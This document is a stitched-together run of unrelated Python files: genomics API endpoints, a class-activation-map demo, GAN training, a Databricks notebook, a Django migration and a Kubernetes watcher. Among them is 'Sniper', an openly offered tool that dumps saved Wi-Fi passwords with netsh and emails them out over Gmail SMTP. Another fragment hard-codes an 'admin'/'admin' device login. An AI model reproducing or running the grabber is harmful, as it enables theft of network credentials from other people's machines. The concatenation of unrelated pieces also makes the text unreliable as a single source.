the 'token' field in the api explorer # but this is not required access_token = request.get_assigned_value('token') if access_token: user_email = get_user_email_from_token(access_token) if user_email: django.setup() try: user_id = Django_User.objects.get(email=user_email).id django_cohort = Django_Cohort.objects.get(id=cohort_id) cohort_perm = Cohort_Perms.objects.get(cohort_id=cohort_id, user_id=user_id) except (ObjectDoesNotExist, MultipleObjectsReturned), e: logger.warn(e) err_msg = "Error retrieving cohort {} for user {}: {}".format(cohort_id, user_email, e) if 'Cohort_Perms' in e.message: err_msg = "User {} does not have permissions on cohort {}. Error: {}"\ .format(user_email, cohort_id, e) request_finished.send(self) raise endpoints.UnauthorizedException(err_msg) query_str = 'SELECT SampleBarcode, GG_dataset_id, GG_readgroupset_id ' \ 'FROM metadata_data ' \ 'JOIN cohorts_samples ON metadata_data.SampleBarcode=cohorts_samples.sample_id ' \ 'WHERE cohorts_samples.cohort_id=%s ' \ 'AND GG_dataset_id !="" AND GG_readgroupset_id !="" ' \ 'GROUP BY SampleBarcode, GG_dataset_id, GG_readgroupset_id;' query_tuple = (cohort_id,) try: db = sql_connection() cursor = db.cursor(MySQLdb.cursors.DictCursor) cursor.execute(query_str, query_tuple) google_genomics_items = [] for row in cursor.fetchall(): google_genomics_items.append( GoogleGenomicsItem( SampleBarcode=row['SampleBarcode'], GG_dataset_id=row['GG_dataset_id'], GG_readgroupset_id=row['GG_readgroupset_id'] ) ) return GoogleGenomicsList(items=google_genomics_items, count=len(google_genomics_items)) except (IndexError, TypeError), e: logger.warn(e) raise endpoints.NotFoundException( "Google Genomics dataset and readgroupset id's for cohort {} not found." .format(cohort_id)) except MySQLdb.ProgrammingError as e: msg = '{}:\n\tquery: {} {}'\ .format(e, query_str, query_tuple) logger.warn(msg) raise endpoints.BadRequestException("Error retrieving genomics data for cohort. {}".format(msg)) finally: if cursor: cursor.close() if db and db.open: db.close() request_finished.send(self) else: raise endpoints.UnauthorizedException("Authentication failed.") GET_RESOURCE = endpoints.ResourceContainer(sample_barcode=messages.StringField(1, required=True)) @endpoints.method(GET_RESOURCE, GoogleGenomicsList, path='google_genomics_from_sample', http_method='GET', name='cohorts.google_genomics_from_sample') def google_genomics_from_sample(self, request): """ Takes a sample barcode as a required parameter and returns the Google Genomics dataset id and readgroupset id associated with the sample, if any. """ # print >> sys.stderr,'Called '+sys._getframe().f_code.co_name cursor = None db = None sample_barcode = request.get_assigned_value('sample_barcode') if are_there_bad_keys(request): err_msg = construct_parameter_error_message(request, False) raise endpoints.BadRequestException(err_msg) query_str = 'SELECT SampleBarcode, GG_dataset_id, GG_readgroupset_id ' \ 'FROM metadata_data ' \ 'WHERE SampleBarcode=%s ' \ 'AND GG_dataset_id !="" AND GG_readgroupset_id !="" ' \ 'GROUP BY SampleBarcode, GG_dataset_id, GG_readgroupset_id;' query_tuple = (sample_barcode,) try: db = sql_connection() cursor = db.cursor(MySQLdb.cursors.DictCursor) cursor.execute(query_str, query_tuple) google_genomics_items = [] for row in cursor.fetchall(): google_genomics_items.append( GoogleGenomicsItem( SampleBarcode=row['SampleBarcode'], GG_dataset_id=row['GG_dataset_id'], GG_readgroupset_id=row['GG_readgroupset_id'] ) ) return GoogleGenomicsList(items=google_genomics_items, count=len(google_genomics_items)) except (IndexError, TypeError), e: logger.warn(e) raise endpoints.NotFoundException( "Google Genomics dataset and readgroupset id's for sample {} not found." .format(sample_barcode)) except MySQLdb.ProgrammingError as e: msg = '{}:\n\tquery: {} {}'\ .format(e, query_str, query_tuple) logger.warn(msg) raise endpoints.BadRequestException("Error retrieving genomics data for sample. {}".format(msg)) finally: if cursor: cursor.close() if db and db.open: db.close()
# -*- coding: utf-8 -*- import keras import numpy as np import cv2 import matplotlib.pyplot as plt from keras.models import Model from keras.layers import Conv2D from keras_applications import efficientnet default_setting = {"backend": keras.backend, "layers": keras.layers, "models": keras.models, "utils": keras.utils} def load_img(fname, input_size, preprocess_fn): original_img = cv2.imread(fname)[:, :, ::-1] original_size = (original_img.shape[1], original_img.shape[0]) img = cv2.resize(original_img, (input_size, input_size)) imgs = np.expand_dims(preprocess_fn(img), axis=0) return imgs, original_img, original_size def postprocess(preds, cams, top_k=1): # idxes = np.argsort(preds[0])[-top_k:] idxes = np.argsort(preds[0])[:top_k] class_activation_map = np.zeros_like(cams[0, :, :, 0]) for i in idxes: class_activation_map += cams[0, :, :, i] class_activation_map[class_activation_map < 0] = 0 class_activation_map = class_activation_map / class_activation_map.max() return class_activation_map if __name__ == '__main__': model = efficientnet.EfficientNetB4(**default_setting) # model.summary() input_size = model.layers[0].output_shape[1] print(input_size) LAST_CONV_LAYER = 'top_activation' PRED_LAYER = 'probs' N_CLASSES = 1000 input_image = "imgs/img2.jpg" original_img = cv2.imread(input_image)[:, :, ::-1] original_size = (original_img.shape[1], original_img.shape[0]) img = cv2.resize(original_img, (input_size, input_size)) img = efficientnet.preprocess_input(img, **default_setting) imgs = np.expand_dims(img, axis=0) print(imgs.shape) final_params = model.get_layer(PRED_LAYER).get_weights() final_params = (final_params[0].reshape( 1, 1, -1, N_CLASSES), final_params[1]) last_conv_output = model.get_layer(LAST_CONV_LAYER).output x = last_conv_output x = Conv2D(filters=N_CLASSES, kernel_size=( 1, 1), name='predictions_2')(x) cam_model = Model(inputs=model.input, outputs=[model.output, x]) cam_model.get_layer('predictions_2').set_weights(final_params) preds, cams = cam_model.predict(imgs) print(preds.shape, cams.shape) # # 4. post processing class_activation_map = postprocess(preds, cams, top_k=10) # 5. plot image+cam to original size plt.imshow(original_img, alpha=0.5) plt.imshow(cv2.resize(class_activation_map, original_size), cmap='jet', alpha=0.5) plt.show()
import subprocess import os import sys import logging import time import email, smtplib, ssl from email import encoders from email.mime.base import MIMEBase from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m' def clear(): os.system('cls') def begin(): print("Let's Start") def warn(): clear() sys.stdout.write(MAGENTA+ ''' _.--""--._ / _ _ \\ _ ( (_\\ /_) ) _ { \\._\\ /\\ /_./ } /_"=-.}______{.-="_\\ _ _.=("""")=._ _ (_'"_.-"***"-._"'_) {_" " _} ''' + RED + ''' [ Disclaimer Alert ]''' + YELLOW + ''' ''' + WHITE + ''' I'm Not Responsible For Misuse ''' + YELLOW + ''' ''' + WHITE + ''' or Illegal Purposes.''' + YELLOW + ''' ''' + WHITE + ''' Use it just for''' + RED + ''' WORK''' + WHITE + ''' or ''' + RED + '''EDUCATIONAL''' + WHITE + ''' ! ''') def heading(): clear() sys.stdout.write(RED + ''' `` `` `` ``` `` ` _```..```````'''+RED+'''.hh/ ``` `````.----:::--::- `` `` `` `` ``` `` ``` ``` ``` `` `` ``` 7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>`` ``` ``` ``` `` `` ``` ` `` `` `` ``` `` `Lxxxxxxx+xxxxxxx++ooo/+oooooooooooooooy> `` `` `` ``` ``` ``` ``` '''+YELLOW+''' ``` `.::-------.. ``` -``` -/mmmmmmmmmmmmmm+++oooosoooooooooooo'''+WHITE+'''///////++++++++++++++++++++++//// `'''+YELLOW+''' `` `Nmmmmmmmmmmmmmmm//` `` `-:/mmmmmmmmmmmmmmmmmmmmmmmmmm'''+WHITE+'''ooooooooooooooooo//::://::::::::::::::::::-`'''+YELLOW+''' `` .Nmmmmmmmmmmmmmmmmmm ``+Nmmmmmmmmmmmmmmmmooooooooo/'''+WHITE+''':::::----::----:..``` `` `` ``` `` ``` '''+YELLOW+''' `-Nmmmmmmmmmmmmmmmmmm/:/xxxxx-`/xx`-xxxxxxxx'''+MAGENTA+''' ``` ``` `` `` `` ``` ``` ``` `` `` ``` ` `` -Nmmmmmmmmmmmmmmmmmmmmmmm``````.-``..` `` `` `` ``` ``` `` `` `` `` ``` `` ``` `:Nmmmmmmmmmmmmmmmmmmmmmm;` `` `` `` ``` ``` `` `` `` ``` ``` ``` `` `` ``` ` `` .Nmmmmmmmmmmmmmmmmmmmmm; `` `` ``` `` `` `` ``` `` `` `` `` `` ``` `` ``` by:''' + WHITE + ' MrAnonymousOfficial (' + YELLOW + '@mr.anonymous_official' + WHITE + ')\n\t\t\t' 'Instagram (' + YELLOW + 'instagram.com/mr.anonymous_official' +WHITE+ ')\n\t\t\t' 'Twitter (' + YELLOW + 'twitter.com/MrAnonymousOfcl' +WHITE+ ')' + '\n''' + END) print ('\n\t\t {0}[{1}M{0}]{1} Send Passcodes to E-Mail {0}[{1}G{0}]{1} Grab Wi-Fi Password\n\t\t {0}[{1}H{0}]{1} Help\t\t\t{0}[{1}Q{0}]{1} Quit '.format(YELLOW, WHITE) + '\n') def mailsender(): clear() subject = "Sniper- Grabbed Wi-Fi Passwords" body = "This is an email sent from Sniper. Find your grabbed Wi-Fi Passwords in the below attached file. Goodbye. " sender_email = input("Enter Your E-Mail ID") password = input("Enter Your Password") receiver_email = input("Enter the E-mail ID of the Reciever") print ('\n') print ('[ * * * * * * * * * * * * * * * * * * * * * * * * * ]') print ('\n email: ' + sender_email) print (' password: ' + password) print (' recieve in:' + receiver_email) print ('\n[ * * * * * * * * * * * * * * * * * * * * * * * * * ]') print ('\n') ask = input('These info above are correct? (y/n) :') if ask == 'y': pass else: mailsender() message = MIMEMultipart() message["From"] = sender_email message["To"] = receiver_email message["Subject"] = subject message["Bcc"] = receiver_email message.attach(MIMEText(body, "plain")) filename = "Passcode.txt" with open(filename, "rb") as attachment: part = MIMEBase("application", "octet-stream") part.set_payload(attachment.read()) encoders.encode_base64(part) part.add_header( "Content-Disposition", f"attachment; filename= {filename}", ) message.attach(part) text = message.as_string() context = ssl.create_default_context() with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as server: server.login(sender_email, password) server.sendmail(sender_email, receiver_email, text) def passwords(): clear() logging.basicConfig(filename="Passcode.txt", level=logging.DEBUG, format="%(message)s") data = subprocess.check_output(['netsh', 'wlan', 'show', 'profiles']).decode('utf-8').split('\n') profiles = [i.split(":")[1][1:-1] for i in data if "All User Profile" in i] for i in profiles: results = subprocess.check_output(['netsh', 'wlan', 'show', 'profile', i, 'key=clear']).decode('utf-8').split('\n') results = [b.split(":")[1][1:-1] for b in results if "Key Content" in b] print(f"{i}:----->{results}") logging.info(str(f"{i}------>{results}")) def main(): clear() warn() x = input('Do You Agree? (Y/N)') if x.upper() == 'Y': pass else: print("Goodbye.....see you next time") sys.exit(0) begin() heading() input('Press ENTER Key to Continue') while True: header = ('{0}SNIPER{1} > {2}'.format(YELLOW, WHITE, END)) choice = input(header) print("You select "+ choice) if choice.upper() == "Q" or choice.upper() == 'QUIT': clear() print("Good bye.......See you Later") raise SystemExit elif choice.upper() == 'G' or choice.upper() == 'GRAB': clear() print("Please wait.......Grabbing passwords") if(os.path.isfile('Passcode.txt')): print("Already File Exists: Do You like to add these details in this file?\n") x = input("(Y/n)") if x.upper() == 'Y': passwords() print("Succesfully Merged The Details in the file\n") else: print("Operation Cancelled\n") else: passwords() print("\n\n\t\t\tYour Requested Wi-Fi Passwords is saved as\n\t\t\t 'Passcode.txt'\n\t\t\tin the same Directory") elif choice.upper() == 'M' or choice.upper() == 'MAIL': clear() print("Please wait.......Starting Mail server") time.sleep(2) if(os.path.isfile('Passcode.txt')): mailsender() else: passwords() mailsender() elif choice.upper() == 'H' or choice.upper() == 'HELP': clear() sys.stdout.write(RED+'''\n\t-----------------------------MANUAL-----------------------------\n Command \t\t\t\tDetails\n'''+MAGENTA+''' h'''+BLUE+''' \t\t\tOpens Manual Page\n'''+MAGENTA+''' m'''+BLUE+''' \t\t\tSends Wi-Fi Passwords to Your E-Mail\n'''+MAGENTA+''' g'''+BLUE+''' \t\t\tGrabs Wi-Fi Passwords\n'''+MAGENTA+''' q'''+BLUE+''' \t\t\tQuits This Application\n'''+MAGENTA+''' help'''+BLUE+'''\t\t\tOpens Manual Page\n'''+MAGENTA+''' mail'''+BLUE+'''\t\t\tSends Wi-Fi Passwords to Your E-Mail\n'''+MAGENTA+''' grab'''+BLUE+'''\t\t\tGrabs Wi-Fi Passwords\n'''+MAGENTA+''' quit'''+BLUE+'''\t\t\tQuits This Application\n'''+RED+''' ------------------------------******------------------------------\n''') else: print("No Command Found. Please Enter the Valid Command\n") if __name__ == "__main__": main()
class Solution: def reverse(self, x: 'int') -> 'int': negative_flag = False if x < 0: x *= -1 negative_flag = True num_str = str(x) s = list(num_str) s.reverse() reversed_int = int(''.join(s)) if negative_flag: result = -1 * reversed_int else: result = reversed_int if -1 * 2**31 <= result < 2 ** 31: return result else: return 0 s = Solution() print(s.reverse(123)) print(s.reverse(-123)) print(s.reverse(120)) print(s.reverse(-120)) print(s.reverse(123456789999))
# encoding:utf-8 import os import torch import torch.nn.functional as F import torch.optim as optim import torchvision from torchvision import transforms as T from torchvision.datasets import ImageFolder from torch.autograd import Variable from torch.utils.data import DataLoader from models.discriminator import Discriminator from models.generator import Generator import time import visdom class ModuleTrain: def __init__(self, opt, best_loss=0.2): self.opt = opt self.best_loss = best_loss # 正确率这个值,才会保存模型 self.netd = Discriminator(self.opt) self.netg = Generator(self.opt) self.use_gpu = False # 加载模型 if os.path.exists(self.opt.netd_path): self.load_netd(self.opt.netd_path) else: print('[Load model] error: %s not exist !!!' % self.opt.netd_path) if os.path.exists(self.opt.netg_path): self.load_netg(self.opt.netg_path) else: print('[Load model] error: %s not exist !!!' % self.opt.netg_path) # DataLoader初始化 self.transform_train = T.Compose([ T.Resize((self.opt.img_size, self.opt.img_size)), T.ToTensor(), T.Normalize(mean=[.5, .5, .5], std=[.5, .5, .5]), ]) train_dataset = ImageFolder(root=self.opt.data_path, transform=self.transform_train) self.train_loader = DataLoader(dataset=train_dataset, batch_size=self.opt.batch_size, shuffle=True, num_workers=self.opt.num_workers, drop_last=True) # 优化器和损失函数 # self.optimizer = optim.SGD(self.model.parameters(), lr=self.lr, momentum=0.5) self.optimizer_g = optim.Adam(self.netg.parameters(), lr=self.opt.lr1, betas=(self.opt.beta1, 0.999)) self.optimizer_d = optim.Adam(self.netd.parameters(), lr=self.opt.lr2, betas=(self.opt.beta1, 0.999)) self.criterion = torch.nn.BCELoss() self.true_labels = Variable(torch.ones(self.opt.batch_size)) self.fake_labels = Variable(torch.zeros(self.opt.batch_size)) self.fix_noises = Variable(torch.randn(self.opt.batch_size, self.opt.nz, 1, 1)) self.noises = Variable(torch.randn(self.opt.batch_size, self.opt.nz, 1, 1)) # gpu or cpu if self.opt.use_gpu and torch.cuda.is_available(): self.use_gpu = True else: self.use_gpu = False if self.use_gpu: print('[use gpu] ...') self.netd.cuda() self.netg.cuda() self.criterion.cuda() self.true_labels = self.true_labels.cuda() self.fake_labels = self.fake_labels.cuda() self.fix_noises = self.fix_noises.cuda() self.noises = self.noises.cuda() else: print('[use cpu] ...') pass def train(self, save_best=True): print('[train] epoch: %d' % self.opt.max_epoch) for epoch_i in range(self.opt.max_epoch): loss_netd = 0.0 loss_netg = 0.0 correct = 0 print('================================================') for ii, (img, target) in enumerate(self.train_loader): # 训练 real_img = Variable(img) if self.opt.use_gpu: real_img = real_img.cuda() # 训练判别器 if (ii + 1) % self.opt.d_every == 0: self.optimizer_d.zero_grad() # 尽可能把真图片判别为1 output = self.netd(real_img) error_d_real = self.criterion(output, self.true_labels) error_d_real.backward() # 尽可能把假图片判别为0 self.noises.data.copy_(torch.randn(self.opt.batch_size, self.opt.nz, 1, 1)) fake_img = self.netg(self.noises).detach() # 根据噪声生成假图 fake_output = self.netd(fake_img) error_d_fake = self.criterion(fake_output, self.fake_labels) error_d_fake.backward() self.optimizer_d.step() loss_netd += (error_d_real.item() + error_d_fake.item()) # 训练生成器 if (ii + 1) % self.opt.g_every == 0: self.optimizer_g.zero_grad() self.noises.data.copy_(torch.randn(self.opt.batch_size, self.opt.nz, 1, 1)) fake_img = self.netg(self.noises) fake_output = self.netd(fake_img) # 尽可能让判别器把假图片也判别为1 error_g = self.criterion(fake_output, self.true_labels) error_g.backward() self.optimizer_g.step() loss_netg += error_g loss_netd /= (len(self.train_loader) * 2) loss_netg /= len(self.train_loader) print('[Train] Epoch: {} \tNetD Loss: {:.6f} \tNetG Loss: {:.6f}'.format(epoch_i, loss_netd, loss_netg)) if save_best is True: if (loss_netg + loss_netd) / 2 < self.best_loss: self.best_loss = (loss_netg + loss_netd) / 2 self.save(self.netd, self.opt.best_netd_path) # 保存最好的模型 self.save(self.netg, self.opt.best_netg_path) # 保存最好的模型 print('[save best] ...') # self.vis() if (epoch_i + 1) % 5 == 0: self.image_gan() self.save(self.netd, self.opt.netd_path) # 保存最好的模型 self.save(self.netg, self.opt.netg_path) # 保存最好的模型 def vis(self): fix_fake_imgs = self.netg(self.opt.fix_noises) visdom.images(fix_fake_imgs.data.cpu().numpy()[:64] * 0.5 + 0.5, win='fixfake') def image_gan(self): noises = torch.randn(self.opt.gen_search_num, self.opt.nz, 1, 1).normal_(self.opt.gen_mean, self.opt.gen_std) with torch.no_grad(): noises = Variable(noises) if self.use_gpu: noises = noises.cuda() fake_img = self.netg(noises) scores = self.netd(fake_img).data indexs = scores.topk(self.opt.gen_num)[1] result = list() for ii in indexs: result.append(fake_img.data[ii]) torchvision.utils.save_image(torch.stack(result), self.opt.gen_img, normalize=True, range=(-1, 1)) # # print(correct) # # print(len(self.train_loader.dataset)) # train_loss /= len(self.train_loader) # acc = float(correct) / float(len(self.train_loader.dataset)) # print('[Train] Epoch: {} \tLoss: {:.6f}\tAcc: {:.6f}\tlr: {}'.format(epoch_i, train_loss, acc, self.lr)) # # test_acc = self.test() # if save_best is True: # if test_acc > self.best_acc: # self.best_acc = test_acc # str_list = self.model_file.split('.') # best_model_file = "" # for str_index in range(len(str_list)): # best_model_file = best_model_file + str_list[str_index] # if str_index == (len(str_list) - 2): # best_model_file += '_best' # if str_index != (len(str_list) - 1): # best_model_file += '.' # self.save(best_model_file) # 保存最好的模型 # # self.save(self.model_file) def test(self): test_loss = 0.0 correct = 0 time_start = time.time() # 测试集 for data, target in self.test_loader: data, target = Variable(data), Variable(target) if self.use_gpu: data = data.cuda() target = target.cuda() output = self.model(data) # sum up batch loss if self.use_gpu: loss = self.loss(output, target) else: loss = self.loss(output, target) test_loss += loss.item() predict = torch.argmax(output, 1) correct += (predict == target).sum().data time_end = time.time() time_avg = float(time_end - time_start) / float(len(self.test_loader.dataset)) test_loss /= len(self.test_loader) acc = float(correct) / float(len(self.test_loader.dataset)) print('[Test] set: Test loss: {:.6f}\t Acc: {:.6f}\t time: {:.6f} \n'.format(test_loss, acc, time_avg)) return acc def load_netd(self, name): print('[Load model netd] %s ...' % name) self.netd.load_state_dict(torch.load(name)) def load_netg(self, name): print('[Load model netg] %s ...' % name) self.netg.load_state_dict(torch.load(name)) def save(self, model, name): print('[Save model] %s ...' % name) torch.save(model.state_dict(), name) # self.model.save(name)
asa_login = { 'host': "192.168.20.17", "username": "admin", "password": "admin" }
# Databricks notebook source # MAGIC %md # MAGIC ### Query variant database # MAGIC # MAGIC 1. point query of specific variants # MAGIC 2. range query of specific gene # COMMAND ---------- import pyspark.sql.functions as fx # COMMAND ---------- variants_df = spark.table("variant_db.exploded") display(variants_df) # COMMAND ---------- # MAGIC %md # MAGIC ##### select random genotype # COMMAND ---------- def get_random_variant(df, seed=0): """ returns a random chromosome, start position and sampleId for querying """ row = df.sample(False, 0.1, seed=seed).limit(1).collect() chrom = row[0].contigName start = row[0].start sampleId = row[0].sampleId return chrom, start, sampleId # COMMAND ---------- # MAGIC %md # MAGIC ##### Select all columns from row of interest # COMMAND ---------- chrom, start, sampleId = get_random_variant(variants_df, seed=42) spark.sql("select * from variant_db.exploded where contigName = '{0}' and start == {1} and sampleId = '{2}'".format(chrom, start, sampleId)).collect() # COMMAND ---------- # MAGIC %md # MAGIC ##### only retrieve genotype # COMMAND ---------- chrom, start, sampleId = get_random_variant(variants_df, seed=84) spark.sql("select `calls` from variant_db.exploded where contigName = '{0}' and start == {1} and sampleId = '{2}'".format(chrom, start, sampleId)).collect() # COMMAND ---------- # MAGIC %md # MAGIC # MAGIC ##### Gene based queries # COMMAND ---------- # MAGIC %md # MAGIC ##### persist gene coordinates into memory # COMMAND ---------- genes = spark.sql("select * from variant_db.annotations") genes.createOrReplaceTempView("genes") spark.table("genes").persist() spark.table("genes").count() # COMMAND ---------- # MAGIC %md # MAGIC ##### select random gene to query # COMMAND ---------- genes_overlap_variants_df = genes.hint("range_join", 10). \ join(variants_df, (variants_df.contigName == genes.contigName) & (variants_df.start > genes.start) & (variants_df.start <= genes.end), "left_semi") # COMMAND ---------- def get_random_gene(df, seed=0): """ returns a random gene for querying """ row = df.sample(False, 0.1, seed=seed).limit(1).collect() gene = row[0].gene return gene # COMMAND ---------- gene = get_random_gene(genes_overlap_variants_df, seed=126) gene # COMMAND ---------- # MAGIC %md # MAGIC ##### query all variants in gene # COMMAND ---------- def get_gene_coords(df, gene): coords = df.where(fx.col("gene") == gene).collect()[0] return coords.contigName, coords.start, coords.end # COMMAND ---------- sampleId = "532" chrom, gene_start, gene_end = get_gene_coords(spark.table("genes"), gene) spark.sql("select * from variant_db.exploded where contigName = '{0}' and start >= {1} and end <= {2} and sampleId = '{3}'".format(chrom, gene_start, gene_end, sampleId)).collect() # COMMAND ----------
# Generated by Django 2.0.6 on 2018-07-17 14:09 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='AuthGroup', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=80, unique=True)), ], options={ 'db_table': 'auth_group', 'managed': False, }, ), migrations.CreateModel( name='AuthPermission', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=255)), ('codename', models.CharField(max_length=100)), ], options={ 'db_table': 'auth_permission', 'managed': False, }, ), migrations.CreateModel( name='AuthUser', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('password', models.CharField(max_length=128)), ('last_login', models.DateTimeField(blank=True, null=True)), ('is_superuser', models.IntegerField()), ('username', models.CharField(max_length=150, unique=True)), ('first_name', models.CharField(max_length=30)), ('last_name', models.CharField(max_length=150)), ('email', models.CharField(max_length=254)), ('is_staff', models.IntegerField()), ('is_active', models.IntegerField()), ('date_joined', models.DateTimeField()), ], options={ 'db_table': 'auth_user', 'managed': False, }, ), migrations.CreateModel( name='AuthUserGroups', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ], options={ 'db_table': 'auth_user_groups', 'managed': False, }, ), migrations.CreateModel( name='AuthUserUserPermissions', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ], options={ 'db_table': 'auth_user_user_permissions', 'managed': False, }, ), migrations.CreateModel( name='DarkskyCurrentWeather', fields=[ ('timestamp', models.DateTimeField(primary_key=True, serialize=False)), ('description', models.CharField(blank=True, max_length=40, null=True)), ('temp', models.FloatField(blank=True, null=True)), ('icon', models.CharField(blank=True, max_length=40, null=True)), ('precip_intensity', models.IntegerField(blank=True, null=True)), ], options={ 'db_table': 'DarkSky_current_weather', 'managed': False, }, ), migrations.CreateModel( name='DarkskyHistoricalWeatherData', fields=[ ('time', models.IntegerField(primary_key=True, serialize=False)), ('day_of_week', models.CharField(blank=True, max_length=20, null=True)), ('description', models.CharField(blank=True, max_length=50, null=True)), ('temp', models.FloatField(blank=True, null=True)), ('precip_intensity', models.FloatField(blank=True, null=True)), ('hour', models.IntegerField(blank=True, null=True)), ('month', models.IntegerField(blank=True, null=True)), ('date', models.DateTimeField(blank=True, null=True)), ('year', models.IntegerField(blank=True, null=True)), ('icon', models.CharField(blank=True, max_length=30, null=True)), ], options={ 'db_table': 'DarkSky_historical_weather_data', 'managed': False, }, ), migrations.CreateModel( name='DarkskyHourlyWeatherPrediction', fields=[ ('timestamp', models.DateTimeField()), ('time', models.IntegerField(primary_key=True, serialize=False)), ('day_of_week', models.CharField(blank=True, max_length=10, null=True)), ('description', models.CharField(blank=True, max_length=40, null=True)), ('temp', models.FloatField(blank=True, null=True)), ('icon', models.CharField(blank=True, max_length=40, null=True)), ('precip_intensity', models.FloatField(blank=True, null=True)), ('hour', models.IntegerField(blank=True, null=True)), ('month', models.IntegerField(blank=True, null=True)), ('date', models.DateTimeField(blank=True, null=True)), ], options={ 'db_table': 'DarkSky_hourly_weather_prediction', 'managed': False, }, ), migrations.CreateModel( name='DjangoAdminLog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('action_time', models.DateTimeField()), ('object_id', models.TextField(blank=True, null=True)), ('object_repr', models.CharField(max_length=200)), ('action_flag', models.PositiveSmallIntegerField()), ('change_message', models.TextField()), ], options={ 'db_table': 'django_admin_log', 'managed': False, }, ), migrations.CreateModel( name='DjangoContentType', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('app_label', models.CharField(max_length=100)), ('model', models.CharField(max_length=100)), ], options={ 'db_table': 'django_content_type', 'managed': False, }, ), migrations.CreateModel( name='DjangoMigrations', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('app', models.CharField(max_length=255)), ('name', models.CharField(max_length=255)), ('applied', models.DateTimeField()), ], options={ 'db_table': 'django_migrations', 'managed': False, }, ), migrations.CreateModel( name='DjangoSession', fields=[ ('session_key', models.CharField(max_length=40, primary_key=True, serialize=False)), ('session_data', models.TextField()), ('expire_date', models.DateTimeField()), ], options={ 'db_table': 'django_session', 'managed': False, }, ), migrations.CreateModel( name='FareStages', fields=[ ('stoppointid', models.IntegerField(primary_key=True, serialize=False)), ('stage', models.IntegerField(blank=True, null=True)), ], options={ 'db_table': 'fare_stages', 'managed': False, }, ), migrations.CreateModel( name='StaticBusData', fields=[ ('long', models.FloatField()), ('lat', models.FloatField()), ('longname', models.CharField(max_length=30)), ('shortname', models.CharField(max_length=30)), ('stoppointid', models.IntegerField(primary_key=True, serialize=False)), ('streetname', models.CharField(max_length=30)), ], options={ 'db_table': 'static_bus_data', 'managed': False, }, ), migrations.CreateModel( name='Trips2017', fields=[ ('dayofservice', models.CharField(blank=True, max_length=30, null=True)), ('tripid', models.IntegerField()), ('lineid', models.CharField(blank=True, max_length=10, null=True)), ('routeid', models.CharField(blank=True, max_length=10, null=True)), ('direction', models.IntegerField(blank=True, null=True)), ('plannedtime_arr', models.IntegerField(blank=True, null=True)), ('plannedtime_dep', models.IntegerField(blank=True, null=True)), ('actualtime_arr', models.IntegerField(blank=True, null=True)), ('actualtime_dep', models.IntegerField(blank=True, null=True)), ('suppressed', models.IntegerField(blank=True, null=True)), ('timestamp', models.IntegerField(primary_key=True, serialize=False)), ], options={ 'db_table': 'trips_2017', 'managed': False, }, ), migrations.CreateModel( name='Leavetimes2017', fields=[ ('dayofservice', models.CharField(blank=True, max_length=30, null=True)), ('progrnumber', models.IntegerField()), ('stoppointid', models.IntegerField(blank=True, null=True)), ('plannedtime_arr', models.IntegerField(blank=True, null=True)), ('plannedtime_dep', models.IntegerField(blank=True, null=True)), ('actualtime_arr', models.IntegerField(blank=True, null=True)), ('actualtime_dep', models.IntegerField(blank=True, null=True)), ('vehicleid', models.IntegerField(blank=True, null=True)), ('suppressed', models.IntegerField(blank=True, null=True)), ('lastupdate', models.CharField(blank=True, max_length=30, null=True)), ('timestamp', models.ForeignKey(db_column='timestamp', on_delete=django.db.models.deletion.DO_NOTHING, primary_key=True, related_name='timestamp_fk', serialize=False, to='api.Trips2017')), ], options={ 'db_table': 'leavetimes_2017', 'managed': False, }, ), ]
# Copyright 2020 Fortinet(c) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Uses watch to print the stream of events from list namespaces and list pods. The script will wait for 10 events related to namespaces to occur within the `timeout_seconds` threshold and then move on to wait for another 10 events related to pods to occur within the `timeout_seconds` threshold..metadata.resource_version """ from kubernetes import client, config, watch import json import os from pprint import pprint def main(): # Configs can be set in Configuration class directly or using helper # utility. If no argument provided, the config will be loaded from # default location. config.load_kube_config() print("PID : %s" % (os.getpid())) v1 = client.CoreV1Api() count = 500 w = watch.Watch() endpoints = v1.list_endpoints_for_all_namespaces(watch=False) endp_resversion = endpoints.metadata.resource_version print (endp_resversion) for event in w.stream(v1.list_endpoints_for_all_namespaces, field_selector="metadata.namespace!=kube-system", resource_version=endp_resversion, timeout_seconds=10, pretty='true'): pprint(event) print("Event: %s %s %s" % ( event['type'], event['object'].metadata.name, event['object'].metadata.annotations)) count -= 1 if not count: w.stop() print("Finished endpoints stream.") ## for event in w.stream(v1.list_service_for_all_namespaces, label_selector="app", timeout_seconds=100): pprint(event) print("Event: %s %s %s" % ( event['type'], event['object'].kind, json.loads(event['object'].metadata.annotations['kubectl.kubernetes.io/last-applied-configuration'])['metadata']) ) count -= 1 if not count: w.stop() print("Finished pod stream.") if __name__ == '__main__': main()
